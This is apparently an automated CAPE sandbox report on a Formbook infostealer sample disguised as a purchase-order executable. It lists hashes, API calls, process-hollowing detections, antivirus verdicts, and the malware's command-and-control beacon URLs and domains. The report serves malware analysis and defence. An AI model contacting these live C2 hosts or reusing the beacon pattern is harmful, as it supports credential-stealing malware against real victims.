2020-06-30 13:48:07,093 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00E10000.
2020-06-30 13:48:07,093 [root] DEBUG: LooksLikeSectionBoundary: Exception occured reading around suspected boundary at 0x00E12000
2020-06-30 13:48:07,093 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2020-06-30 13:48:07,109 [root] DEBUG: DumpPE: Instantiating PeParser with address: 0x00E10000.
2020-06-30 13:48:07,109 [root] DEBUG: DumpPE: Empty or inaccessible last section, file image seems incomplete (from 0x00E59200 to 0x00E59400).
2020-06-30 13:48:07,125 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4740_4032622747482030262020 (size 0x5c8)
2020-06-30 13:48:07,125 [root] DEBUG: DumpRegion: Dumped stack region from 0x008F0000, size 0x1000.
2020-06-30 13:48:07,140 [root] DEBUG: DumpPE: Error: Cannot dump PE file from memory.
2020-06-30 13:48:07,140 [root] DEBUG: DumpImageInCurrentProcess: Failed to dump 'raw' PE image from 0x00E10000, dumping memory region.
2020-06-30 13:48:07,156 [root] DEBUG: DLL unloaded from 0x76490000.
2020-06-30 13:48:07,156 [root] DEBUG: DLL unloaded from 0x0FE60000.
2020-06-30 13:48:07,156 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\YCyAWu\CAPE\4740_11152062897482030262020 (size 0x12b)
2020-06-30 13:48:07,156 [root] DEBUG: DumpRegion: Dumped stack region from 0x00030000, size 0x1000.
2020-06-30 13:48:07,156 [root] DEBUG: DLL unloaded from 0x6B910000.
2020-06-30 13:48:07,171 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 4460
2020-06-30 13:48:07,187 [root] DEBUG: DLL loaded at 0x00700000: C:\tmp2ylp3rhi\dll\mwMhyAcm (0xd5000 bytes).
2020-06-30 13:48:11,343 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 4740
2020-06-30 13:48:11,390 [root] DEBUG: GetHookCallerBase: thread 4708 (handle 0x0), return address 0x00417A0A, allocation base 0x00400000.
2020-06-30 13:51:14,046 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-30 13:51:14,062 [lib.api.process] ERROR: Failed to open terminate event for pid 4460
2020-06-30 13:51:14,093 [root] INFO: Terminate event set for process 4460.
2020-06-30 13:51:14,093 [lib.api.process] ERROR: Failed to open terminate event for pid 4740
2020-06-30 13:51:14,093 [root] INFO: Terminate event set for process 4740.
2020-06-30 13:51:14,093 [root] INFO: Created shutdown mutex.
2020-06-30 13:51:15,093 [root] INFO: Shutting down package.
2020-06-30 13:51:15,093 [root] INFO: Stopping auxiliary modules.
2020-06-30 13:51:15,203 [lib.common.results] WARNING: File C:\YCyAWu\bin\procmon.xml doesn't exist anymore
2020-06-30 13:51:15,203 [root] INFO: Finishing auxiliary modules.
2020-06-30 13:51:15,203 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-06-30 13:51:15,203 [root] WARNING: Folder at path "C:\YCyAWu\debugger" does not exist, skip.
2020-06-30 13:51:15,218 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7_2 win7_2 KVM 2020-06-30 13:54:16 2020-06-30 13:59:30

File Details

File Name PO8397234.exe
File Size 300032 bytes
File Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
PE timestamp 2020-06-30 07:13:04
MD5 38bcdd78a3aa9a815e7c5b09ffcafa1a
SHA1 125cab05a33197836b43307160177917027d9f96
SHA256 d2e60c3bec22bb8dc8e990920648725abd8ffdc1925dee26ed8c8187dd7504c1
SHA512 cbaedc53feb55139e952187bcfe3cd74461591419b31babd5124567cec04aedefbf6b7dad21dcc4aedac47ee5aec0a8e3762e9ba34ab44ceaef58a883c34e186
CRC32 64B8E7B1
Ssdeep 6144:EKRRhT7rYb8U8Rohqw8rJZ2IHO/I/FTC9zYr7b5:EKRRhT7B+85u/I/FTCWr7b5
Download Download ZIP Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction - unpacking
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 4460 trigged the Yara rule 'shellcode_patterns'
Hit: PID 4460 trigged the Yara rule 'shellcode_get_eip'
Hit: PID 4460 trigged the Yara rule 'shellcode_stack_strings'
Hit: PID 4460 trigged the Yara rule 'Formbook'
Hit: PID 4460 trigged the Yara rule 'embedded_pe'
Creates RWX memory
Guard pages use detected - possible anti-debugging.
Dynamic (imported) function loading detected
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: KERNEL32.dll/FlsAlloc
DynamicLoader: KERNEL32.dll/FlsFree
DynamicLoader: KERNEL32.dll/FlsGetValue
DynamicLoader: KERNEL32.dll/FlsSetValue
DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
DynamicLoader: KERNEL32.dll/CreateEventExW
DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
DynamicLoader: KERNEL32.dll/SetThreadpoolWait
DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
DynamicLoader: KERNEL32.dll/CompareStringEx
DynamicLoader: KERNEL32.dll/GetDateFormatEx
DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
DynamicLoader: KERNEL32.dll/GetTimeFormatEx
DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
DynamicLoader: KERNEL32.dll/IsValidLocaleName
DynamicLoader: KERNEL32.dll/LCMapStringEx
DynamicLoader: KERNEL32.dll/GetCurrentPackageId
DynamicLoader: KERNEL32.dll/GetTickCount64
DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
DynamicLoader: KERNEL32.dll/AcquireSRWLockExclusive
DynamicLoader: KERNEL32.dll/ReleaseSRWLockExclusive
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: MSCOREE.DLL/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/_CorExeMain_RetAddr
DynamicLoader: mscoreei.dll/_CorExeMain
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: KERNEL32.dll/FlsAlloc
DynamicLoader: KERNEL32.dll/FlsFree
DynamicLoader: KERNEL32.dll/FlsGetValue
DynamicLoader: KERNEL32.dll/FlsSetValue
DynamicLoader: KERNEL32.dll/InitializeCriticalSectionEx
DynamicLoader: KERNEL32.dll/CreateEventExW
DynamicLoader: KERNEL32.dll/CreateSemaphoreExW
DynamicLoader: KERNEL32.dll/SetThreadStackGuarantee
DynamicLoader: KERNEL32.dll/CreateThreadpoolTimer
DynamicLoader: KERNEL32.dll/SetThreadpoolTimer
DynamicLoader: KERNEL32.dll/WaitForThreadpoolTimerCallbacks
DynamicLoader: KERNEL32.dll/CloseThreadpoolTimer
DynamicLoader: KERNEL32.dll/CreateThreadpoolWait
DynamicLoader: KERNEL32.dll/SetThreadpoolWait
DynamicLoader: KERNEL32.dll/CloseThreadpoolWait
DynamicLoader: KERNEL32.dll/FlushProcessWriteBuffers
DynamicLoader: KERNEL32.dll/FreeLibraryWhenCallbackReturns
DynamicLoader: KERNEL32.dll/GetCurrentProcessorNumber
DynamicLoader: KERNEL32.dll/GetLogicalProcessorInformation
DynamicLoader: KERNEL32.dll/CreateSymbolicLinkW
DynamicLoader: KERNEL32.dll/SetDefaultDllDirectories
DynamicLoader: KERNEL32.dll/EnumSystemLocalesEx
DynamicLoader: KERNEL32.dll/CompareStringEx
DynamicLoader: KERNEL32.dll/GetDateFormatEx
DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
DynamicLoader: KERNEL32.dll/GetTimeFormatEx
DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
DynamicLoader: KERNEL32.dll/IsValidLocaleName
DynamicLoader: KERNEL32.dll/LCMapStringEx
DynamicLoader: KERNEL32.dll/GetCurrentPackageId
DynamicLoader: KERNEL32.dll/GetTickCount64
DynamicLoader: KERNEL32.dll/GetFileInformationByHandleExW
DynamicLoader: KERNEL32.dll/SetFileInformationByHandleW
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: clr.dll/SetRuntimeInfo
DynamicLoader: USER32.dll/GetProcessWindowStation
DynamicLoader: USER32.dll/GetUserObjectInformationW
DynamicLoader: clr.dll/_CorExeMain
DynamicLoader: KERNEL32.dll/AcquireSRWLockExclusive
DynamicLoader: KERNEL32.dll/ReleaseSRWLockExclusive
DynamicLoader: MSCOREE.DLL/CreateConfigStream
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: KERNEL32.dll/GetNumaHighestNodeNumber
DynamicLoader: KERNEL32.dll/FlsSetValue
DynamicLoader: KERNEL32.dll/FlsGetValue
DynamicLoader: KERNEL32.dll/FlsAlloc
DynamicLoader: KERNEL32.dll/FlsFree
DynamicLoader: KERNEL32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: KERNEL32.dll/AddSIDToBoundaryDescriptor
DynamicLoader: KERNEL32.dll/CreateBoundaryDescriptorW
DynamicLoader: KERNEL32.dll/CreatePrivateNamespaceW
DynamicLoader: KERNEL32.dll/OpenPrivateNamespaceW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: KERNEL32.dll/DeleteBoundaryDescriptor
DynamicLoader: KERNEL32.dll/WerRegisterRuntimeExceptionModule
DynamicLoader: KERNEL32.dll/RaiseException
DynamicLoader: MSCOREE.DLL/
DynamicLoader: mscoreei.dll/
DynamicLoader: KERNELBASE.dll/SetSystemFileCacheSize
DynamicLoader: ntdll.dll/NtSetSystemInformation
DynamicLoader: KERNELBASE.dll/PrivIsDllSynchronizationHeld
DynamicLoader: KERNEL32.dll/AddDllDirectory
DynamicLoader: KERNEL32.dll/SortGetHandle
DynamicLoader: KERNEL32.dll/SortCloseHandle
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: cryptbase.dll/SystemFunction036
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: clrjit.dll/sxsJitStartup
DynamicLoader: clrjit.dll/jitStartup
DynamicLoader: clrjit.dll/getJit
DynamicLoader: KERNEL32.dll/GetLocaleInfoEx
DynamicLoader: KERNEL32.dll/LocaleNameToLCID
DynamicLoader: KERNEL32.dll/GetUserDefaultLocaleName
DynamicLoader: KERNEL32.dll/LCIDToLocaleName
DynamicLoader: KERNEL32.dll/GetUserPreferredUILanguages
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: KERNEL32.dll/GetFullPathName
DynamicLoader: KERNEL32.dll/GetFullPathNameW
DynamicLoader: uxtheme.dll/IsAppThemed
DynamicLoader: uxtheme.dll/IsAppThemedW
DynamicLoader: KERNEL32.dll/CreateActCtx
DynamicLoader: KERNEL32.dll/CreateActCtxA
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: USER32.dll/RegisterWindowMessage
DynamicLoader: USER32.dll/RegisterWindowMessageW
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: MSCOREE.DLL/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: KERNEL32.dll/CompareStringOrdinal
DynamicLoader: KERNEL32.dll/SetThreadErrorMode
DynamicLoader: KERNEL32.dll/GetFileAttributesEx
DynamicLoader: KERNEL32.dll/GetFileAttributesExW
DynamicLoader: KERNEL32.dll/ResolveLocaleName
DynamicLoader: gdiplus.dll/GdiplusStartup
DynamicLoader: KERNEL32.dll/IsProcessorFeaturePresent
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: GDI32.dll/ExtTextOutW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: gdiplus.dll/GdipLoadImageFromStream
DynamicLoader: WindowsCodecs.dll/DllGetClassObject
DynamicLoader: gdiplus.dll/GdipImageForceValidation
DynamicLoader: gdiplus.dll/GdipGetImageType
DynamicLoader: gdiplus.dll/GdipGetImageRawFormat
DynamicLoader: gdiplus.dll/GdipGetImageWidth
DynamicLoader: gdiplus.dll/GdipGetImageHeight
DynamicLoader: gdiplus.dll/GdipBitmapGetPixel
DynamicLoader: nlssorting.dll/SortGetHandle
DynamicLoader: nlssorting.dll/SortCloseHandle
DynamicLoader: KERNEL32.dll/LCMapStringEx
DynamicLoader: KERNEL32.dll/CreateProcess
DynamicLoader: KERNEL32.dll/CreateProcessW
DynamicLoader: KERNEL32.dll/GetThreadContext
DynamicLoader: KERNEL32.dll/ReadProcessMemory
DynamicLoader: KERNEL32.dll/VirtualAllocEx
DynamicLoader: KERNEL32.dll/WriteProcessMemory
DynamicLoader: KERNEL32.dll/SetThreadContext
DynamicLoader: KERNEL32.dll/ResumeThread
DynamicLoader: ole32.dll/CoWaitForMultipleHandles
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: gdiplus.dll/GdipDisposeImage
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: ole32.dll/NdrOleInitializeExtension
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: KERNEL32.dll/CreateActCtxW
DynamicLoader: KERNEL32.dll/AddRefActCtx
DynamicLoader: KERNEL32.dll/ReleaseActCtx
DynamicLoader: KERNEL32.dll/ActivateActCtx
DynamicLoader: KERNEL32.dll/DeactivateActCtx
DynamicLoader: KERNEL32.dll/GetCurrentActCtx
DynamicLoader: KERNEL32.dll/QueryActCtxW
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/EventUnregister
CAPE extracted potentially suspicious content
PO8397234.exe: Unpacked Shellcode
PO8397234.exe: Formbook Payload
PO8397234.exe: Formbook
PO8397234.exe: Unpacked Shellcode
PO8397234.exe: Unpacked Shellcode
PO8397234.exe: Unpacked Shellcode
PO8397234.exe: Unpacked Shellcode
PO8397234.exe: Formbook Payload: 32-bit executable
PO8397234.exe: Formbook
PO8397234.exe: Unpacked Shellcode
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.magentos.info/b6fg/?Y2sDANLX=Fv1c+gXtWYBCQk+xHwP156qcIQ+60UnD2N5efydHvXLARdkbiTKxZWIKUbnnbBYJS02k6g==&bj=UTpLQHTh5TvhP
suspicious_request: http://www.callisterlawgroup.com/b6fg/?Y2sDANLX=i86svkdPMuoSeDhhFJ4e6n6wN6gQMedHqObOsSeLdahcNU70hhRUteckpwABhiEVdYZs9Q==&bj=UTpLQHTh5TvhP&gi-s=ApXDCv_H
suspicious_request: http://www.xinhby.com/b6fg/?Y2sDANLX=DPbGDB5TD6UfGrq05TzqLuMXD+LK6vv4sTGjEb5I8sepxxHDnXsT2ICuKauJmHVONNAp7Q==&bj=UTpLQHTh5TvhP&kUVn=H0HdZlj0
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Performs some HTTP requests
url: http://www.magentos.info/b6fg/
url: http://www.magentos.info/b6fg/?Y2sDANLX=Fv1c+gXtWYBCQk+xHwP156qcIQ+60UnD2N5efydHvXLARdkbiTKxZWIKUbnnbBYJS02k6g==&bj=UTpLQHTh5TvhP
url: http://www.callisterlawgroup.com/b6fg/?Y2sDANLX=i86svkdPMuoSeDhhFJ4e6n6wN6gQMedHqObOsSeLdahcNU70hhRUteckpwABhiEVdYZs9Q==&bj=UTpLQHTh5TvhP&gi-s=ApXDCv_H
url: http://www.xinhby.com/b6fg/?Y2sDANLX=DPbGDB5TD6UfGrq05TzqLuMXD+LK6vv4sTGjEb5I8sepxxHDnXsT2ICuKauJmHVONNAp7Q==&bj=UTpLQHTh5TvhP&kUVn=H0HdZlj0
The binary likely contains encrypted or compressed data.
section: name: .text, entropy: 7.83, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00041000, virtual_size: 0x00040f00
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error File not valid C\Users\Rebecca\AppData\Local\Temp\PO8397234.exe
Behavioural detection: Injection (Process Hollowing)
Injection: PO8397234.exe(4460) -> PO8397234.exe(4740)
Executed a process and injected code into it, probably while unpacking
Injection: PO8397234.exe(4460) -> PO8397234.exe(4740)
Behavioural detection: Injection (inter-process)
Network activity detected but not expressed in API logs
CAPE detected the Formbook malware family
File has been identified by 11 Antiviruses on VirusTotal as malicious
Cylance: Unsafe
Sangfor: Malware
APEX: Malicious
Paloalto: generic.ml
Kaspersky: UDS:DangerousObject.Multi.Generic
MaxSecure: Trojan.Malware.300983.susgen
Cyren: W32/MSIL_Troj.WM.gen!Eldorado
Microsoft: Trojan:Win32/Wacatac.C!ml
ZoneAlarm: UDS:DangerousObject.Multi.Generic
Malwarebytes: Trojan.MalPack.ADC
ESET-NOD32: a variant of MSIL/Kryptik.WPS
Created network traffic indicative of malicious activity
signature: ET JA3 Hash - Possible Malware - Various Malspam/RigEK

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 50.63.202.41 [VT] United States
N 34.102.136.180 [VT] United States
N 199.192.30.223 [VT] United States
Y 1.1.1.1 [VT] Australia

DNS

Name Response Post-Analysis Lookup
www.biblebeater.com [VT] NXDOMAIN
www.296djw.info [VT]
www.belinv.com [VT]
www.magentos.info [VT] A 199.192.30.223 [VT] 199.192.30.223 [VT]
www.callisterlawgroup.com [VT] A 34.102.136.180 [VT] 34.102.136.180 [VT]
www.evntmonitor.com [VT]
www.xinhby.com [VT] A 50.63.202.41 [VT] 50.63.202.40 [VT]
www.thekoulenresidence.com [VT]
www.8800pe.com [VT]
www.quantumpearlpoc.com [VT]
www.venglishhouse.com [VT] 153.127.214.206 [VT]
www.robynhoodofretail.info [VT]
www.mohajrannoor.com [VT]
www.sgknox.com [VT] 104.247.82.10 [VT]
www.descubriendonoruega.com [VT] 88.99.186.213 [VT]

Summary

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe.config
C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-2.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\System32\api-ms-win-core-quirks-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\6715dc4d04e35f16d482900c355325e9\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\6715dc4d04e35f16d482900c355325e9\mscorlib.ni.dll.aux
C:\Users
C:\Users\Rebecca
C:\Users\Rebecca\AppData
C:\Users\Rebecca\AppData\Local
C:\Users\Rebecca\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\KLretdEyph\*
C:\Users\Rebecca\AppData\Local\Temp\PO8397234.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol224.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\aece3d371c0714e60f9509d2a3137395\System.Windows.Forms.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\aece3d371c0714e60f9509d2a3137395\System.Windows.Forms.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\43822396682b0ffc3cfb66137ddab95f\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\43822396682b0ffc3cfb66137ddab95f\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\2c462a934e0586ac5e46c8b93e461384\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\2c462a934e0586ac5e46c8b93e461384\System.Drawing.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters.Soap\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Formatters.Soap.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\uxtheme.dll
C:\Users\Rebecca\AppData\Local\Temp\en-US\KLretdEyph.resources.dll
C:\Users\Rebecca\AppData\Local\Temp\en-US\KLretdEyph.resources\KLretdEyph.resources.dll
C:\Users\Rebecca\AppData\Local\Temp\en-US\KLretdEyph.resources.exe
C:\Users\Rebecca\AppData\Local\Temp\en-US\KLretdEyph.resources\KLretdEyph.resources.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\en-US\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\en-US\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\en\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\en\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Users\Rebecca\AppData\Local\Temp\en\KLretdEyph.resources.dll
C:\Users\Rebecca\AppData\Local\Temp\en\KLretdEyph.resources\KLretdEyph.resources.dll
C:\Users\Rebecca\AppData\Local\Temp\en\KLretdEyph.resources.exe
C:\Users\Rebecca\AppData\Local\Temp\en\KLretdEyph.resources\KLretdEyph.resources.exe
C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24308_none_5c028e37a0121035
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24308_none_5c028e37a0121035\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\6090b158fd3d10686b422a455e188125\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\6090b158fd3d10686b422a455e188125\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c8a2021e940773064c655a6ea6ee8cb2\System.Core.ni.dll
